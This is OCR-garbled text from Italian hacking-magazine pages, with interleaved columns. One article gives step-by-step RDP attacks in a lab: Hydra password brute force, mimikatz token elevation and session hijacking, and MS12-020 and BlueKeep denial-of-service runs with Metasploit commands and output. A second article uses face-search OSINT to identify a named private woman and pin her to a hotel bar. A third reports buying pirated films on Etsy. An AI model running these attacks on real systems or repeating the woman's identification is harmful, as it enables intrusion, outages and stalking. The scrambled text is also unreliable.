china è SERVERO1. Ora adesso tentare 
il nostro attacco. Utilizzeremo Hydra: 


hydra -l blue -P /usr/share/ 
wordlists/rockyou.txt 
rdp://192.168.178.131 -V -t 4 


nmap -A 192.168.178.131 -p 

3389 

L'opzione -A innmap è una delle opzioni 
più potenti e utili, poiché combina diver- 
se funzionalità di alto livello in un singo- 
lo flag. L'opzione -A attiva la rilevazione 
delle versioni, l'esecuzione di script, il 
riconoscimento dei sistemi operativi e il 
traceroute. 

* Rilevazione della versione (-sV): nmap 
tenta di determinare la versione delle 
applicazioni che sono in esecuzione su 
ciascuna porta aperta. 


e hydra: avvia il tool. 

° -l blue: specifica un nome utente per 
il tentativo di accesso. 

e -P /usr/share/wordlists/rockyou. 


txt: utilizziamo un elenco di pas- 
sword. Il file /usr/share/wordlists/ 
rockyou.txt è una delle wordlist più 
trapelate da un data leak. 

* rdp://192.168.178.131: specifica a 
hydra di tentare l'attacco sul servizio RDP 
all'indirizzo IP 192.168.178.131. 

° -V: per visualizzare tutti i tentativi di 
accesso nel terminale. La “V” sta per “ver- 
bose”, ovvero “dettagliato”. 

® -t 4: questa opzione indica a hydra di 
utilizzare 4 connessioni. Effettuiamo 
adesso l'accesso in RDP su SERVERO1: 
xfreerdp /v:192.168.178.131 
/u:blue /p:shadow1 

e xfreerdp: è il nome del client FreeRDP 
che viene utilizzato per stabilire connes- 
sioni RDP. 

* /v:192.168.178.131: specifica l'indiriz- 
zo IP del server a cui connettersi. 
*/u:blue: specifichiamo il nome utente 
con cui si desidera connettersi. 

* /p:shadow1: forniamo la password 
per l'account utente specificato. In que- 
sto esempio, la password è “shadow1”. 
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Scenario 2 | Session Hijacking 


Dopo aver ottenuto le credenziali dell'utente "Blue" siamo riusciti ad avere accesso RDP 
alla macchina SERVERO1. Supponiamo adesso che un altro utente sia loggato sulla 
macchina o che la sua sessione sia rimasta attiva non avendo effettuato il log-off. 


n termini generali, dopo che un uten- 

te ha effettuato l’accesso a un sistema 
o applicazione, gli viene assegnato un 
token di sessione o un cookie di ses- 
sione. Se un malintenzionato riesce a 
catturare questo token o cookie, può 
impersonare quell'utente e accedere 
alla sessione come se fosse lui. 
Eseguiamo l'accesso sulla macchina 
vittima SERVERO1 via RDP, come fatto 
in precedenza [figura #3]. 
Per portare a segno questo attacco 
avremo bisogno del tool mimikatz sul- 
la macchina target. Individuiamo il 
percorso del file binario sulla macchi- 
na attaccante, con il comando: 


impacket. Tuttavia, procediamo utiliz- 
zando un metodo meno popolare e 
creiamo una share sulla macchina 
attaccante attraverso Samba. Per pri- 
ma cosa, modifichiamo il file di confi- 
gurazione di Samba con un editor di 
testo: 

sudo mousepad /etc/samba/smb.conf 


abbiamo messo a disposizione attra- 
verso samba) sulla macchina vittima: 
copy \\192.168.178.129\ 
RDPAttack\mimikatz.exe C:\ 
Users\Blue\ 

Siamo connessi alla macchina vittima 
come “Blue”, ne abbiamo conferma 
eseguendo il comando in powershell: 


Spostiamoci alla fine del file e inseria- 
mo i parametri della condivisione: 


[RDPAttack] 


[System.Security.Principal. 
WindowsIdentity]::GetCurrent(). 
Name 


path = /home/a1rk/RDPAttack/ 


available = yes 


read only = no 


o più semplicemente whoami. 
Avviamo adesso mimikatz e listiamo le 
sessioni attive sulla macchina: 


browsable = yes 


./mimikatz.exe 


public = yes 


privilege :: debug 


locate mimikatz 


writable = yes 


ts ::sessions 


Creiamo una directory dove andremo 
a posizione il tool mimikatz. Nel mio 
caso, il percorso completo è: 


/home/a1lrk/RDPAttack 


Riavviamo il servizio Samba per appli- 
care le modifiche sudo service smbd 
restart e infine diamo permessi full alla 
nostra share: 


Copiamolo nella directory che abbiamo 
creato: 


cp /usr/share/windows- 
resources/mimikatz/x64/ 
mimikatz.exe /home/a1rk/ 
RDPAttack 


Adesso dobbiamo trasferire il file sul- 
la macchina vittima. 

Per farlo, possiamo servirci di svariate 
modalità, compreso l'utilizzo del tool 


ittico A 


Kali Task Manager 


_ Users 


è Admin 
2 Blue (52) 


? Processes 
Performance 


to) App history 


Status CPU Memo 


sudo chmod 777 RDPAttack 


NB: alla fine dell'operazione ricordia- 
moci di eliminare la share. 

Torniamo sulla macchina vittima, dove 
abbiamo una sessione RDP attiva con 
l'utente Blue. 

Utilizziamo la combinazione di tasti Win 
+ R per lanciare Powershell con l'omo- 
nimo comando e copiamo dalla share 
contenente l'eseguibile di mimikatz (che 


jblisher, or PID to sea w 5 


Type a name, pub 


Ea Run newtask — Disconnect 


12% 42% 1% 0% 
y Disk —Network 


0 MB/s 0 Mbps 


OMB/s —OMbps 


Come possiamo osservare, all'utente 
“Admin” è assegnata la sessione nu- 
mero 1. Cerchiamo adesso un token 
con privilegi elevati (ad esempio, un 
token di un processo di sistema o di 
un amministratore) e “usurpiamo” tale 
token per elevare i privilegi della ses- 
sione corrente. 

Il nostro target è NT Authority\SYSTEM. 
NT Authority\SYSTEM è un'identità 
speciale nel sistema operativo Windows 
e rappresenta il livello più alto di pri- 
vilegi. 

Ha accesso a tutti i sistemi e ai servizi 
sul computer locale, e può effettuare 
qualsiasi operazione. 

token:: elevate 

Adesso possiamo prendere il control- 
lo della sessione dell'utente “Admin” 
aperta sulla macchina, digitando il 
comando: 

ts::remote /id:1 

Appena avremo dato invio, verremo 
switchati automaticamente sulla ses- 
sione attiva dell'utente “Admin”. 


a vulnerabilità MS12-020 permet- 

te agli attaccanti di inviare pac- 
chetti malevoli a un sistema che 
consente l’accesso RDP, causando 
potenzialmente un crash del servi- 
zio e rendendolo inutilizzabile. Più 
specificamente, si trattava di un 
attacco di tipo Denial of Service (DoS). 
Eseguiremo l'attacco su un'altra 
macchina connessa in rete all’|P: 
192.168.178.133. 
Per portare a segno questo attacco, 
sfrutteremo il Framework di Meta- 
sploit. Sulla macchina attaccante 
digitiamo: msfconsole. Una volta 
eseguito il Framework, utilizziamo 
uno dei moduli ausiliari per vedere 
se il target è vulnerabile. 
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Scenario 3 | DOS Attack Vuln MS12-020 


Molte organizzazioni non implementano policy di aggiornamento adeguate, 
mantenendo vivi sistemi operativi obsoleti e non aggiornati. Sia organizzazioni con 
risorse limitate e conoscenze insufficienti in materia di sicurezza, sia organizzazioni 
molto grandi che non hanno un pieno controllo sui loro sistemi (ad esempio per via di 
software obsoleti compatibili esclusivamente con determinate versioni di un dato 
sistema operativo) tendono a mantenere versioni vecchie di Windows non aggiornate 
e pericolosamente esposte. Il nostro attaccante ha intenzione di causare un 
disservizio alla società, mettendo offline il loro server. 


msf6 auxiliary( ) > set 
RHOSTS > 192.168.178.133 
msf6 auxiliary( ) > [run 
[+] 192.168.178.133:3389 - 192.168.178.133:3389 
{*] 192.168.178.133:3389 - Scanned 1 of 1 hosts 
[*] Auxiliary module execution completed 

msf6 auxiliary( ) 


& 


ali 


File Macchina Visualizza Inserimento Dispositivi Aiuto 


lx] 


RHOSTS 192.168.178.133 


- The target is vulnerable. 
(100% complete) 


Lanciamo il modulo ausiliario: 


use auxiliary/scanner/rdp/ 
ms12_020 check 
Settiamo il target 
Set RMIOSTS 1201068 IV79 135) 


E Action EUito Vie rieio 
RHOSTS > 192.168.178.133 

Insf6 auxiliary( 

{*] Running module against 192.168.178.133 


[®] 192.168.178.133:3389 - 
[+] 192.168.178.133:3389 - 
La 92.168.178.133:3389 - 192.168.178.133:3389 

[+] 192.168.178.133:3389 - 192.168.178.133:3389 seems down 
[*] Auxiliary module execution completed 

Imsf6 auxiliary( 


192.168.178.133:3389 
192.168.178.133:3389 - 


) > exploit 


Run 


Inizialmente, viene individuato il 


- Sending MS12-020 Microsoft Remote Desktop Use-After-Free DoS 
210 bytes sent 
- Checking RDP status... 


File Macchina Visualizza Inserimento | Dispositivi | Aiuto 


Windows Error Recovery 


start Windows Normal1y] 


th 


dispositivo target attraverso il suo 
indirizzo IP, dopodiché stabilisce una 
connessione con esso via RDP. Una 
volta che il dispositivo target con- 
ferma di essere pronto per la con- 
nessione, l'exploit invia sequenze di 
pacchetti di dimensione crescente 
fino a che il dispositivo crasha. Nel- 
la nostra dimostrazione, possiamo 
osservare che la sequenza inizia con 
un pacchetto di 210 byte. 
Carichiamo il modulo per eseguire 
l'attacco: 

use auxiliary/dos/windows/ 


rdp/ms12_020 _maxchannelids 


settiamo il target 
SET ROSTA 1021163 3117831198) 
Lanciamo l'attacco 


exploit 
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Scenario 4 | DoS: BlueKeep Exp 


In maniera simile al precedente scenario, l'organizzazione target possiede diverse 
macchine Windows 7 a 64bit (non aggiornate) che fanno parte di un'ipotetica rete 
di magazzino, accessibile tramite una rete Wi-Fi non sufficientemente protetta. 
Lo scopo dell'attaccante è causare un disservizio alla società mettendo offline 


le macchine. 


lueKeep è una vulnerabilità 
individuata nell’architettura RDP 
e permette a un attaccante di ese- 
guire codice remotamente. Identi- 


ficata nella metà del 2019, compor- 
ta un particolare rischio per i 
sistemi Windows Server 2008 e 
Windows 7. L'attacco si basa sulla 
corruzione dell'heap e all'interno 
di Metasploit sono disponibili lo 
scanner dedicato e l'exploit. 
Cominciamo quindi con avviare 
nuovamente il Framework di attac- 
co Metasploit, attraverso il coman- 
do msfconsole. 

Carichiamo il modulo ausiliario per 
eseguire il check sulla vulnerabilità: 
use auxiliary/scanner/rdp/ 
cve_2019_0708_bluekeep 
Specifichiamo il target: 


Il target è vulnerabile. L'exploit di 
BlueKeep è stato originariamente 
pensato per accedere alla macchi- 
na target. Perché l'exploit funzio- 
ni, è necessario trovare l'indirizzo 
iniziale del parametro Non-Page- 
dPool e inserirlo nell'exploit. Per 
eseguire questa operazione do- 
vremmo avere accesso alla mac- 
china virtuale target e scaricare 
l'intero contenuto della memoria, 
cosa che il nostro attaccante non 
può fare. Utilizzerà quindi l'exploit 
BlueKeep per generare un memory 
corruption nei sistemi target cau- 
sando di conseguenza un Denial 
of Service. 

Procediamo quindi con il tentativo 
di exploitation. Switchiamo il mo- 
dulo passando a: 


set RHOSTS 192.168.178.135 


set RHOSTS 192.168.178.135 
Lanciamo il modulo: 


use exploit/windows/rdp/ 
cve_2019_0708_bluekeep_rce 


run 


msf6 exploit( 


Started reverse TCP handler on 192.168.178.129:4444 
13389 - Running automatic check ("set AutoCheck false" to disable) 
389 - Using auxiliary/scanner/rdp/cve_2019_0708_bluekeep as check 
- The target is vulnerable. The target attempted cleanup of the incorrectly-bound MS_T120 channel. 
- Scanned 1 of 1 hosts (100% complete) 
- The target is vulnerable. The target attempted cleanup of the incorrectly-bound MS_T120 channel. 
Using CHUNK grooming strategy. Size 250MB, target address 0xfffffa8040600000, Channel count 1. 


192.168.178. 
192.168.178. 
192.168.178. 
192.168.178. 
192.168.178. 
192.168.178. 
192.168.178. 
192.168.178. 
192.168.178. 
192.168.178. 
192.168.178. Li 


Surfing channels ... 
Lobbing eggs ... 


I°. 


Workstation » | BR » 


Library 


My Computer 
‘Windows Server 2008 Ri 
» Windows 7 x64 
5] Shared VMs 


Specifichiamo il target: 


) >Texploit 


«—T_—_____— | Entering Danger Zone | —____-> 


Forcing the USE of FREE'd object ... 
—_—_—_———_— | Leaving Danger Zone | —_____>-» 


Questa volta avremo bisogno di 
specificare quale tipologia di am- 
biente target stiamo per “exploita- 
re”. Quindi digitiamo info per ave- 
re ulteriori informazioni sull'exploit 
che stiamo per lanciare. 

L'exploit richiede poi ulteriori para- 
metri: la versione del sistema ope- 
rativo target e l'eventuale ambien- 
te di virtualizzazione che lo ospita, 
selezioniamo quindi il target 3. 
set target 3 

Lasciamo il payload di default, in quan- 
to il nostro intento è esclusivamente 
quello di causare un Denial of Service 
dell'host. Possiamo ora lanciare l'exploit 
con l'omonimo comando. 

exploit 


Dopo pochi secondi, la schermata 
blu di Windows confermerà il cra- 
sh e l'errore che avevamo previsto 
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inevitabilmente meno. Ma 
evidentemente va bene così! La figura #1: 
gente ama mostrarsi agli altri, 

vuole che il mondo la osservi... ma 
si rende davvero conto delle 


informazioni che pubblica? Una 
foto è realmente solo una foto? 


In questo articolo utilizzeremo 
l'Open Source INTelligence (OSINT) 
per mostrare come è possibile 


individuare il luogo esatto in cui è 
stata scattata una foto. 


La foto che esamineremo è di 
bassa qualità e per l'angolazione 
con cui è stata scattata nasconde 
molti dettagli che potevano essere 
utili, mostrandoci piuttosto il 
soffitto bianco. Gli unici elementi 
che sicuramente catturano 
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molto comune. Dunque, non 
avendo sufficienti informazioni e 
dettagli sul luogo, sicuramente 
possiamo concentrare le ricerche 


OSINT sulla donna [figura #1]. 
MIGLIORARE LA QUALITÀ 


La donna ritratta nella foto non è 
un personaggio pubblico, quindi 
per prima cosa dobbiamo capire 
chi è. L'immagine è piccola e 
piuttosto sgranata, ma possiamo 
provare a migliorarne la qualità 
per vedere meglio i lineamenti del 
volto. | tool online che abbiamo 
provato per fare il de-blur di una 
foto sono: Fotor (httpSs:// 
uwww.fotor.com/features/ unblur-image/), 
particolarmente efficace sui volti 
in quanto ha delle ottimizzazioni 
specifiche basate sull'uso di 
intelligenza artificiale e PicWish 
(https://picwish.com/ 
unblur-image-portrait), che 
permette di ottenere immagini di 
qualità nettamente superiore, ma 
può deformare alcuni tratti del 
viso ad esempio a causa di 
macchie o rumore di fondo nelle 


foto [figura #2]. 


Come anticipato le foto processate 


con PicWish hanno un maggiore 
livello di dettaglio ma, utilizzando 
come sorgente la foto originale, 


vediamo come occhi, naso e bocca 


vengano leggermente distorte. La 
migliore versione è quella che 
unisce entrambi i tool, mostrata di 
seguito a confronto con la foto 


originale [figura #3]. 
TROVARE ALTRE FOTO 


Avere la foto del viso è un grande 
vantaggio quando si cerca di 
identificare un soggetto. In 
particolare possiamo utilizzarla 
per cercare eventuali account 
social o altre foto pubblicate 
online che ritraggono lo stesso 
soggetto. Anche in questo caso 
l'avvento delle IA ha notevolmente 
migliorato il numero e la qualità 
dei risultati, permettendoci non 
solo di cercare la fonte della foto 
originale, ma qualsiasi altra foto 
che ritragga lo stesso soggetto, 
anche se in un ambiente diverso, 
con una diversa espressione 


facciale, con un diverso taglio di 
capelli ecc. Le migliori fonti OSINT 
che abbiamo trovato per fare 
questo sono: 

* PimEyes (https://pimeyes.com/ 
en/), forse la soluzione che offre 
più risultati. Ha un enorme 
database di immagini prese da 
fonti open tra cui anche alcune 
CDN. Sono esclusi i social network 
per una questione di rispetto delle 
policy che non permettono il 
crawling automatico. 

* Search4Faces (https:// 
search4faces.com/en/), permette di 
fare ricerche con filtri avanzati 
come età, nazionalità, città e 
sesso, ma è limitato 
principalmente a TikTok e 
Vkontakte, quindi particolarmente 
efficace per soggetti di origine 
russa o proveniente dai Paesi del 
CSI. Supponiamo che il soggetto 
non sia di origine russa, in modo 
da mostrare l'approccio utilizzabile 
nella maggioranza dei casi. 
Andiamo quindi a utilizzare 
PimEyes per le analisi, che si 
presenta così: [figura #4]. 

È sufficiente cliccare su Upload a 
photo e caricare una o più foto 
del soggetto; in automatico 
l'applicazione andrà a individuare 
e isolare il volto. A questo punto 
possiamo inserire qualche filtro > 
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UPLOAD PHOTO AND FIND OUT WHERE IMAGES ARE PUBLISHED 


(®  uposdaphoo 


ll quick, is accurate, its 
facial recognition on steroids” 


come quello per i contenuti 
espliciti o relativamente al range 
temporale entro cui cercare. 
Quando siamo pronti clicchiamo 
su Start Search [figura #5]. 

Come avrete notato nell'immagine 
precedente, la foto utilizzata per la 
ricerca non è quella migliorata, ma 
l'originale perché utilizzando la 
foto migliorata non abbiamo 
ottenuto alcun risultato. Questo 
probabilmente è dovuto a due 
fattori: da un lato l'IA che esegue 
l'ottimizzazione può aggiungere o 
manipolare caratteristiche del viso 
rendendolo un viso diverso agli 
occhi del motore di ricerca. 
Dall'altra è possibile che le altre 
foto disponibili online siano 
anch'esse sfocate, quindi più simili 
all'originale. Avere una foto più 
definita ci aiuterà comunque a 
riconoscere il soggetto tra le 
ipotesi risultato della ricerca. 


Avviando la ricerca in pochi 
secondi otteniamo dei risultati 
sorprendenti. Tutti i primi risultati 
mostrati raffigurano il soggetto, a 
parte la statua... che comunque 
ha caratteristiche fisionomiche 
molto simili [figura #6]. 

| risultati di PimEyes non mostrano 
l'intera foto né il link al sito dove è 
stata presa (a meno di avere un 
abbonamento o pagare intorno ai 
17€). Quello che ci mostra è il 
dominio principale dove la foto è 
stata presa o quante volte quella 
foto è stata trovata in siti diversi. 
Osservando alcuni dei domini 
notiamo che si tratta perlopiù di 
siti che fanno leak di profili privati 
di OnlyFans, Fansly o altre 
piattaforme simili. Questo ci dà tre 
informazioni fondamentali: 1) il 
soggetto probabilmente ha un 
canale privato in cui pubblica 
contenuti espliciti; 2) chi ci ha 
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Face search 


Add more photos for 
better results 
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Start Search 


Fre ches available: 6/10 


mandato questa foto potrebbe 
essere abbonato al canale privato 
del soggetto (ok, questa forse non 
è un'informazione fondamentale); 
3) da un lato sarà più facile 
ottenere ulteriori informazioni (es. 
canali social come TikTok o 
Instagram per pubblicizzare il 
canale privato), ma allo stesso 
tempo potrebbe complicare le 
ricerche perché molti search 
engine limitano i risultati espliciti 
anche disabilitando i relativi filtri. 


TROVARE L'IDENTITÀ 

A questo punto abbiamo 
abbastanza foto per poter fare 
altre ricerche. Tra tutte andiamo a 
prendere quelle con contenuti 
non espliciti e che sono state 
trovate più volte. Nei risultati 
precedenti ci sono parecchi selfie 
con il telefono in mano, quindi 
prendiamo queste come foto da 
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cercare in quanto quelle con 
maggiore probabilità di darci un 
riscontro. Per la ricerca OSINT 
utilizzeremo la Reverse Image 
Search di Yandex (l'equivalente 
russo di Google) in quanto ha 
molti meno filtri sui contenuti 
espliciti rispetto agli altri motori di 
ricerca, quindi date le 
considerazioni di prima è più 
probabile che otterremo dei 
risultati. Apriamo Yandex Images 
(https://yandex.com/imagesp/), 
clicchiamo sull'icona della 
macchina fotografica e facciamo 
l'upload della foto scelta dai 
risultati di PimEyes; nel nostro 
caso la seconda della prima riga 
[figura #7]. In questo caso 
troviamo un match esatto che ci 
permette di risalire alla foto 
originale, al link esatto da cui è 
stata presa e all'identità del 
soggetto: Ekaterina Martynova 


vitto 


a.k.a kat3martynova o 
katmartynova1. 


INDICARE IL LUOGO 

Per identificare il luogo o altre 
informazioni che ci potrebbero 
portare al luogo ci spostiamo su 
Google in modo da sfruttare a 
nostro vantaggio tutti i limiti sui 
contenuti espliciti concentrandoci 
su foto e video che potrebbero 
contenere più dettagli. Notiamo 
subito che il soggetto è molto 
attivo su praticamente qualsiasi 
canale social, probabilmente una 
persona che vive di questo. 
Provando a scorrere gli account 
Instagram, TikTok, VKontakte ecc. 
non ci sono tracce del luogo che 
stiamo cercando o di altri dettagli. 
Purtroppo non sapendo quanto 
tempo fa sia stata scattata la foto 
non sappiamo quanto dobbiamo 
scrollare per trovarla, quindi 


Google 
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kat3martynova adult hotel 


Maps 


https:/vww.youtube.com » watch 


https:/www.youtube,com > watch 


andiamo a dare un'occhiata 
fugace anche a tutti gli altri canali. 
Aprendo il canale YouTube ci salta 
subito all'occhio un dettaglio: 
[figura #8]. Nell'ultimo video in 
basso a destra il vestito indossato 
dal soggetto sembra essere lo 
stesso della foto originale. 
Apriamo il video e verifichiamo: 
[figura #9]. È piuttosto evidente 
che si tratti dello stesso vestito; lo 
notiamo in particolare da: stesso 
colore; stesse pieghe sulle 
maniche date dalla lunghezza; 
stessi spacchi laterali; stesso 
dettaglio bianco sul fianco sinistro 
sopra lo spacco. Andando a 
leggere la descrizione del video 
otteniamo due informazioni molto 
importanti [figura #10]. 

Prima di tutto abbiamo una data: 
22 aprile 2023. Questo ci 
permette di fare ricerche solo nel 
periodo di interesse spostandoci 
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da un range temporale di diversi 
anni a uno o due mesi al 
massimo. In secondo luogo, la 
descrizione dice che questo 
vestito è per una serata in 
discoteca in un hotel per soli 
adulti in cui va ogni anno. Questo 
ci permette di ipotizzare che 
siano presenti molti contenuti 
nello stesso posto, anche negli 
altri anni precedenti. Da un lato 
allarghiamo di nuovo la ricerca, 
dall'altro aumentiamo 
sensibilmente la probabilità di 
successo. La prima cosa che 
proviamo a questo punto è fare 
una ricerca mirata su Google con 
una query di ricerca del tipo 
“katB3martynova adult hotel”: 
[figura #11]. Il primo risultato è il 
video che abbiamo già analizzato, 
mentre il secondo utilizza le 
stesse parole chiave ed è stato 
pubblicato anche nello stesso 


Booking.com 


ratti £ 


periodo; sicuramente vale la pena 
dargli un'occhiata e infatti... 
[figura #12]. 
Andando avanti, al minuto 3:40, si 
riescono a riconoscere le strutture 
presenti in secondo piano sulla 
foto originale e nella descrizione 
del video viene dato il nome 
dell'hotel: Adam and Eve. 

Da notare, inoltre, che in questo 
video il soggetto dice di aver 
vissuto per un mese in questo 
hotel, infatti la data di questo 
video e del precedente 
differiscono di circa un mese, 
confermando si tratti non solo 
dell'hotel corretto, ma anche del 
periodo corretto. A questo punto 
ci basta una semplice ricerca su 
Booking (o qualsiasi altra 
piattaforma di prenotazione di 
hotel) per avere la posizione 
esatta dove è stata scattata la foto, 
cioè l'hotel Adam & Eve che si 


Adam & Eve - Adult Only 


Belek Turchia Buona posizione [vedi mappa) 


trova in Iskele Mevkii Antalya, 
07500 Belek, Turchia 


TROVARE 

ILPOSTO ESATTO 

Tornando alla foto originale, 
cerchiamo di individuare alcuni 
dettagli importanti che ci possano 
aiutare a trovare il posto esatto 
all'interno dell'hotel dove è stata 
scattata la foto. Notiamo in 
particolare: in alto, degli speaker 
bianchi (indicati dalle frecce verdi); 
sulla sinistra, una o più colonne 
bianche in sequenza (indicate 
dalle frecce gialle); a destra, l'inizio 
di una parete di specchi (indicata 
dalle frecce blu) [figura #15]. 
Andando sul sito Web dell'hotel 
Adam & Eve, nella sezione Photo 
Gallery visibile nel footer della 
pagina ci sono diverse foto dei bar 
interni al locale in cui riconosciamo 
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gli stessi dettagli della foto 
precedente, oltre ai finti alberi di 
mele in pieno stile giardino 
dell'Eden. Per sapere con 
esattezza dove si trova l'edificio 
del bar all'interno dell'hotel 
possiamo utilizzare Wikimapia 
(https://wikimapia.org), un servizio 
che rappresenta il connubio tra 
Wikipedia e le mappe di Google, in 
cui sono stati censiti tutti gli edifici 


invece delle sole strade. In 
questo modo possiamo 
facilmente identificare l'esatta 
posizione su Mappa, riuscendo 
ad individuare il Bar all'interno 
della struttura dell'hotel. 

Con quest'analisi abbiamo voluto 
mostrare come anche la più 
piccola, sgranata e 
apparentemente insignificante 
foto fornita senza alcuna 


‘Aggiungi il tuo commento in russian 


informazione di contesto può 
essere il punto di partenza per un 
attaccante in grado di utilizzare 
tecniche OSINT, per trovare molte 
altre informazioni. Non staremo 
qui a dire di non pubblicare nulla 
o di smettere di utilizzare i social 
network, ma siate consapevoli che 
una foto non è solo una foto, ogni 
dettaglio è un'informazione 
preziosa per chi la sa cogliere. 


Gli strumenti Open Source intelligence vengono adoperati anche nel campo della sicurezza 


e delle indagini forensi 


Le fonti OSINT si distinguono per la loro legalità e 
accessibilità pubblica: nono devono violare leggi su 
copyright e privacy. Una caratteristica che rende l'OSINT 
utile non solo per i servizi di intelligence, ma anche per le 
aziende che cercano informazioni sui concorrenti. Tra chi le 
utilizza, tuttavia non ci sono solo operatori commerciali, ma 
enti governativi, (inclusi dipartimenti militari), organizzazioni 
internazionali come le Nazioni Unite e la Croce Rossa, 
Agenzie militari e di polizia (per prevenire crimini attraverso 
il monitoraggio di social media per parole chiave e immagini 
rilevanti). E naturalmente, penetration tester e hacker, che 
usano gli strumenti OSINT per raccogliere informazioni 
online su obiettivi specifici. 


Controlli preventivi 

Degne di nota sono anche altre tipologie di strumenti: 
servizi che consentono di prevenire indagini OSINT, diciamo 
così, poco ortodosse. Quindi, da utilizzare per bloccare sul 
nascere possibili furti di identità. Qualche esempio? Il sito 
https://osint.industries/ permette di cercare indirizzi email e 
numeri di telefono nel Web, oppure https:/ipalyzer.com che 
analizza gli IP e consegna dati come il provider e la location. 
E ancora Wappalyzer (https://\www.wappalyzer.com/), che 
permette di scoprire le tecnologie utilizzate sui siti Web. 


È in grado di rilevare sistemi di gestione dei contenuti, 
piattaforme di e-commerce, framework Web, server, 
strumenti di analisi e molto altro. Si può citare anche il 
software burp, in grado di analizzare i codici di stato HTTP e 
le intestazioni delle risposte e di controllare le intestazioni 
CSP, consentendo così il caricamento degli script. Per non 
parlare infine dei repository dei codici come github, gitlab o 
bitbucket, dove si trovano vulnerabilità del web, problemi di 
configurazione sui sistemi software e chiavi segrete. O come 
Github Dorks, che può essere utilizzato per cercare dati 
sensibili come credenziali, token di autenticazione, ecc. 
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Dopo essersi registrati sul sito https://osint. 
industries/, basta inserire il proprio indirizzo 


emailo il proprio numero di telefono per 
controllare se nel Web c'è traccia di tali 


informazioni. 
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Abbiamo scova i 
piene di film... a prezzi 


olti di voi 

ricorderanno che 

nel periodo che va 

dalla metà degli 
anni ‘90 ai primi anni 2000, 
quando ormai le musicassette 
“Mixed by Erry” erano arrivate 
al termine della loro vita, 
comparvero sul “mercato” le 
cosiddette Twilight, 
compilation contenenti decine 
di giochi e programmi 
commerciali craccati, 
distribuite in tutta Italia prima 
su CD e poi su DVD 


[figura #1]. 
CHI TROPPO SALE... 


La rivoluzione Internet e la 
disponibilità di connessioni 
sempre più veloci ed 
economicamente alla portata 
di tutti fece in modo che la 


to un sito che vende pen drive 
pazzi. Vediamoci chiaro! 


“by Erry”, diventando un'altra 
stella nel calderone delle 
memorabilie pre-Internet, 
mentre la mente a capo di 
tutto questo, un ragazzo 
olandese, veniva condannato 
a versare una multa di 1,5 
milioni di euro per violazione 
del diritto d'autore. 

Il ruolo svolto dalla Twilight 
venne ben presto soppiantato 
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Twilight andasse naturalmente 
a morire come le musicassette 
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dai siti Warez, sui quali 
venivano pubblicati 
giornalmente programmi e 
giochi privi di protezione e 
installabili liberamente da 
chiunque. Ovviamente, alcuni 
di questi siti contribuirono 
largamente anche alla 
diffusione di virus e malware 
di ogni genere... ma questa è 
un'altra storia! 
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E arriviamo ai giorni nostri, nei 
quali, a quanto pare, sta 
tornando di moda qualcosa di 
molto simile alle Twilight. 


IL NUOVO TWILIGHT 

Su alcuni siti di vendite online 
si stanno diffondendo annunci 
di vendita di supporti USB di 
varie dimensioni (si va da 
quelle “povere” da 16GB a 
salire fino a 256GB e oltre) che 
contengono intere serie TV, 
film, giochi e programmi. 
Sfogliando le pagine di questi 
siti si trovano sia chiavette il 
cui contenuto è prestabilito 
dal “produttore”, sia chiavette 
personalizzabili, nelle quali il 
contenuto viene scelto 
dall'acquirente. In entrambi i 
casi il prezzo dipende non dal 
tipo di contenuti, ma dalle 
dimensioni del supporto e 
dalla quantità di materiale 
presente. Si parte da un 
minimo di una ventina d'euro 
per una chiavetta da 16GB 
piena di contenuti (dieci- 
quindici film), per arrivare alle 
200 euro e oltre. Ma sono 
annunci reali? Le chiavette, 


una volta acquistato, arrivano 
poi davvero? E i contenuti? 
Che qualità hanno? Abbiamo 
voluto dare una risposta a 
queste domande, effettuando 
noi stessi un acquisto 
utilizzando il sito Etsy (https:// 
www. etsy.com/it/) 


ILNOSTRO ACQUISTO 
Per scegliere la chiavetta da 
acquistare ci siamo collegati al 
noto sito di e-commerce 
(https://www.etsy.com/it)). 
Queste pendrive possono 
essere trovate effettuando 
una semplice ricerca con le 
parole chiavi “USB contenuti 
digitali”. L'esito della ricerca 
riporta come primo link un 
annuncio che ci è parso subito 
interessante, ovvero 
“Personalizza la tua chiavetta 
USB”, a un prezzo tutto 
sommato accettabile: 24,90 
euro per una chiavetta da 
16GB (quelle da 32 e 64GB 
non erano disponibili). 


LISCIO COME L'OLIO 
L'acquisto si concretizza come 
se acquistassimo un qualsiasi 


OH ??2 inviato un messaggio 


Salve, ho visto l'ordine appena effettuato effettuato. Visto che hai 
scelto quello personalizzato che contenuti ti servivano? 


altro prodotto su Etsy, quindi 
si può pagare con carta di 
credito, PayPal, Google Pay 
oppure Klarna (un sistema di 
pagamento che permette di 
suddividere l'importo in 3 
rate). In ogni caso, abbiamo la 
protezione sugli acquisti, per 
cui, rincuorati da questo, 
proseguiamo e concretizziamo 
l'acquisto. 

Poche ore dopo l'acquisto 
veniamo contattati tramite il 
sistema di messaggistica Etsy 
dal venditore che ci chiede 
come vogliamo personalizzare 
la nostra chiavetta. Chiediamo 
se sia disponibile un elenco o 
qualcosa del genere e 
veniamo indirizzati su un sito 
che contiene film da scaricare, 
ovviamente infischiandosene 
dei diritti d'autore e di 
qualunque altro vincolo legale. 


[figura #2], 
COSA ABBIAMO SCELTO 


Per riempire la nostra 
“chiavetta test”, abbiamo 
optato per 10 titoli di recente 
uscita e chiesto che avessero 
una qualità adeguata 
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(almeno Full-HD) a poter 
essere riprodotti su un TV 4K. 
Alla fine cambiamo un film 
perché disponibile solo in 
inglese con sottotitoli italiani 
e come bonus otteniamo un 
undicesimo titolo a scelta del 
venditore (c'era rimasto circa 
1,5GB di spazio libero sulla 
chiavetta). 

Per farla breve, in due giorni 
la chiavetta è risultata pronta 
alla spedizione. Prima, però, 
veniamo ricontattati per la 
conferma dell'indirizzo e 
dopo altri due giorni la 
chiavetta è nelle nostre mani, 


a 


con 11 film pronti per essere 
riprodotti. 


TUTTO BENE QUINDI? 
PIU O MENO 

È vero che abbiamo la 
chiavetta, ed è anche vero che 
sono presenti i film che 
avevamo scelto, ma la qualità? 
Ovviamente, nessuno dei film 
presenti sulla chiavetta può 
rivaleggiare con un Blu-ray. 
Alcuni sono compressi in 
qualità inferiore alla HD 
(fotogrammi da 720 x 304 0 
720 x 400 pixel), altri in qualità 
HD (fotogrammi da 1.366 x 


720 pixel), altri ancora quasi in 
Full-HD (1.920 x 800 oppure 
1.710 x 720 pixel). Alcuni 
mostrano evidenti scalettature 
e artefatti di colore, segno 
evidente di una compressione 
esagerata, altri sono 
decisamente trattati meglio. 
Uno dei video pare un misto 
(anche fatto bene) tra 
immagini riprese da una fonte 
quantomeno Full-HD e audio 
